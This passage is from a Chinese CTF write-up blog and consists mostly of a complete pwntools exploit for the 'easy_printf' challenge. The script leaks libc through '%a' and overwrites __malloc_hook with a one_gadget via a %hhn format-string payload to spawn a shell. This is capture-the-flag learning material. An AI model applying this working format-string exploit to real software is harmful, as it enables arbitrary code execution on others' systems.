class="line">elf = ELF(<span class="string">'./easy_printf'</span>)</span><br><span class="line">libc = elf.libc</span><br><span class="line">one = [<span class="number">0x4f2c5</span>,<span class="number">0x4f322</span>,<span class="number">0x10a38c</span>]</span><br><span class="line"><span class="comment"># p = remote("nc.eonew.cn","10010")</span></span><br><span class="line"><span class="comment">#内存地址随机化</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span><span class="params">(addr=<span class="number">0</span>,PIE=True)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> PIE:</span><br><span class="line">        text_base = int(os.popen(<span class="string">"pmap &#123;&#125;| awk '&#123;&#123;print $1&#125;&#125;'"</span>.format(p.pid)).readlines()[<span class="number">1</span>], <span class="number">16</span>)</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"breakpoint_addr --&gt; "</span> + hex(text_base + <span class="number">0x202040</span>)</span><br><span class="line">        gdb.attach(p,<span class="string">'b *&#123;&#125;'</span>.format(hex(text_base+addr)))</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        gdb.attach(p,<span class="string">"b *&#123;&#125;"</span>.format(hex(addr))) </span><br><span class="line">p.sendlineafter(<span class="string">"choice: "</span>,<span class="string">'1'</span>)</span><br><span class="line"><span class="comment"># debug(0xa82)</span></span><br><span class="line">p.sendlineafter(<span class="string">"fmt: \n"</span>,<span class="string">"%a%a"</span>)</span><br><span class="line">p.recv(<span class="number">11</span>)</span><br><span class="line">addr = p.recvuntil(<span class="string">"p-"</span>)[:<span class="number">-2</span>]</span><br><span class="line">addr += <span class="string">"00"</span></span><br><span class="line">libc_base = int(addr,<span class="number">16</span>) - <span class="number">0x3eba00</span></span><br><span class="line">free_hook = libc_base + libc.symbols[<span class="string">'__free_hook'</span>]</span><br><span class="line">malloc_hook = libc_base + libc.symbols[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">malloc = libc_base + libc.symbols[<span class="string">'malloc'</span>]</span><br><span class="line">free = libc_base + libc.symbols[<span class="string">'free'</span>]</span><br><span class="line">onegadget = libc_base + one[<span class="number">1</span>]</span><br><span class="line">log.info(<span class="string">"libc_base --&gt; %s"</span>,hex(libc_base))</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">'\n'</span>,<span class="string">'2'</span>)</span><br><span class="line">log.info(<span class="string">"malloc_hook --&gt; %s"</span>,hex(malloc_hook))</span><br><span class="line">log.info(<span class="string">"free_hook --&gt; %s"</span>,hex(free_hook))</span><br><span class="line">log.info(<span class="string">"malloc --&gt;%s"</span>,hex(malloc))</span><br><span class="line">log.info(<span class="string">"free --&gt; %s"</span>,hex(free))</span><br><span class="line">log.info(<span class="string">"onegadget --&gt; %s"</span>,hex(onegadget))</span><br><span class="line"></span><br><span class="line"><span class="comment"># debug(0xadd)</span></span><br><span class="line">a = (onegadget &gt;&gt; <span class="number">40</span>) &amp; <span class="number">0xff</span></span><br><span class="line">b = (onegadget &gt;&gt; <span class="number">32</span>) &amp; <span class="number">0xff</span></span><br><span class="line"><span class="keyword">while</span> b &lt; a:</span><br><span class="line">	b += <span class="number">0x100</span></span><br><span class="line">c = (onegadget &gt;&gt; <span class="number">24</span>) &amp; <span class="number">0xff</span></span><br><span class="line"><span class="keyword">while</span> c &lt; b:</span><br><span class="line">	c += <span class="number">0x100</span></span><br><span class="line">d = (onegadget &gt;&gt; <span class="number">16</span>) &amp; <span class="number">0xff</span></span><br><span class="line"><span class="keyword">while</span> d &lt; c:</span><br><span class="line">	d += <span class="number">0x100</span></span><br><span class="line">e = (onegadget &gt;&gt; <span class="number">8</span>) &amp; <span class="number">0xff</span></span><br><span class="line"><span class="keyword">while</span> e &lt; d:</span><br><span class="line">	e += <span class="number">0x100</span></span><br><span class="line">f = (onegadget) &amp; <span class="number">0xff</span></span><br><span class="line"><span class="keyword">while</span> f &lt; e:</span><br><span class="line">	f += <span class="number">0x100</span></span><br><span class="line"></span><br><span class="line">log.success(<span class="string">"a: %s"</span>,hex(a))</span><br><span class="line">log.success(<span class="string">"b: %s"</span>,hex(b))</span><br><span class="line">log.success(<span class="string">"c: %s"</span>,hex(c))</span><br><span class="line">log.success(<span class="string">"d: %s"</span>,hex(d))</span><br><span class="line">log.success(<span class="string">"e: %s"</span>,hex(e))</span><br><span class="line">log.success(<span class="string">"f: %s"</span>,hex(f))</span><br><span class="line"></span><br><span class="line">pay = <span class="string">""</span></span><br><span class="line"></span><br><span class="line">pay += <span class="string">"%"</span> + str(a) + <span class="string">"c%18$hhn"</span></span><br><span class="line">pay += <span class="string">"%"</span> + str(b - a) + <span class="string">"c%19$hhn"</span></span><br><span class="line">pay += <span class="string">"%"</span> + str(c - b) + <span class="string">"c%20$hhn"</span></span><br><span class="line">pay += <span class="string">"%"</span> + str(d - c) + <span class="string">"c%21$hhn"</span></span><br><span class="line">pay += <span class="string">"%"</span> + str(e - d) + <span class="string">"c%22$hhn"</span></span><br><span class="line">pay += <span class="string">"%"</span> + str(f - e) + <span class="string">"c%23$hhn"</span></span><br><span class="line">pay += <span class="string">"%100000c"</span></span><br><span class="line">pay = pay.ljust(<span class="number">0x50</span>,<span class="string">'A'</span>)</span><br><span class="line">pay += p64(malloc_hook+<span class="number">5</span>)</span><br><span class="line">pay += p64(malloc_hook+<span class="number">4</span>)</span><br><span class="line">pay += p64(malloc_hook+<span class="number">3</span>)</span><br><span class="line">pay += p64(malloc_hook+<span class="number">2</span>)</span><br><span class="line">pay += p64(malloc_hook+<span class="number">1</span>)</span><br><span class="line">pay += p64(malloc_hook)</span><br><span class="line"></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">py64 = FormatStr(isx64=1)</span></span><br><span class="line"><span class="string">py64[free_hook] = onegadget</span></span><br><span class="line"><span class="string">pay = py64.payload(8)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># pay = ""</span></span><br><span class="line"><span class="comment"># pay += "%100000c"</span></span><br><span class="line"><span class="comment"># pay += "%1024c%11$hn"</span></span><br><span class="line"><span class="comment"># pay = pay.ljust(0x18,'A')</span></span><br><span class="line"><span class="comment"># pay += p64(free_hook)</span></span><br><span class="line"></span><br><span class="line">p.sendline(pay)</span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">p.sendline(<span class="string">"cat flag&gt;&amp;0"</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/06/21/Off-By-One之Asis CTF 2016 b00s/" rel="next" title="Off-By-One之Asis CTF 2016 b00s">
                <i class="fa fa-chevron-left"></i> Off-By-One之Asis CTF 2016 b00s
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/06/21/oss-fuzz初探/" rel="prev" title="oss-fuzz没什么用笔记">
                oss-fuzz没什么用笔记 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/n0va.jpg" alt="R4bb1t">
            
              <p class="site-author-name" itemprop="name">R4bb1t</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">52</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友链
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xi4or0uji.github.io/" title="Xi4or0uji" target="_blank">Xi4or0uji</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://gdufs-king.github.io/" title="V1ctor" target="_blank">V1ctor</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://z3r3f.gitee.io/" title="23r3f" target="_blank">23r3f</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://zszcr.github.io/" title="zs0zrc" target="_blank">zs0zrc</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://dittozzz.top/" title="ditto" target="_blank">ditto</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://ch4r1l3.github.io/" title="ch4r1l3" target="_blank">ch4r1l3</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://nightrainy.github.io/" title="知世" target="_blank">知世</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#1、2017-0ctf-EasiestPrintf"><span class="nav-number">1.</span> <span class="nav-text">1、2017-0ctf-EasiestPrintf</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2、easy-printf"><span class="nav-number">2.</span> <span class="nav-text">2、easy_printf</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#a-leak-libc"><span class="nav-number">2.1.</span> <span class="nav-text">%a leak libc</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">R4bb1t</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
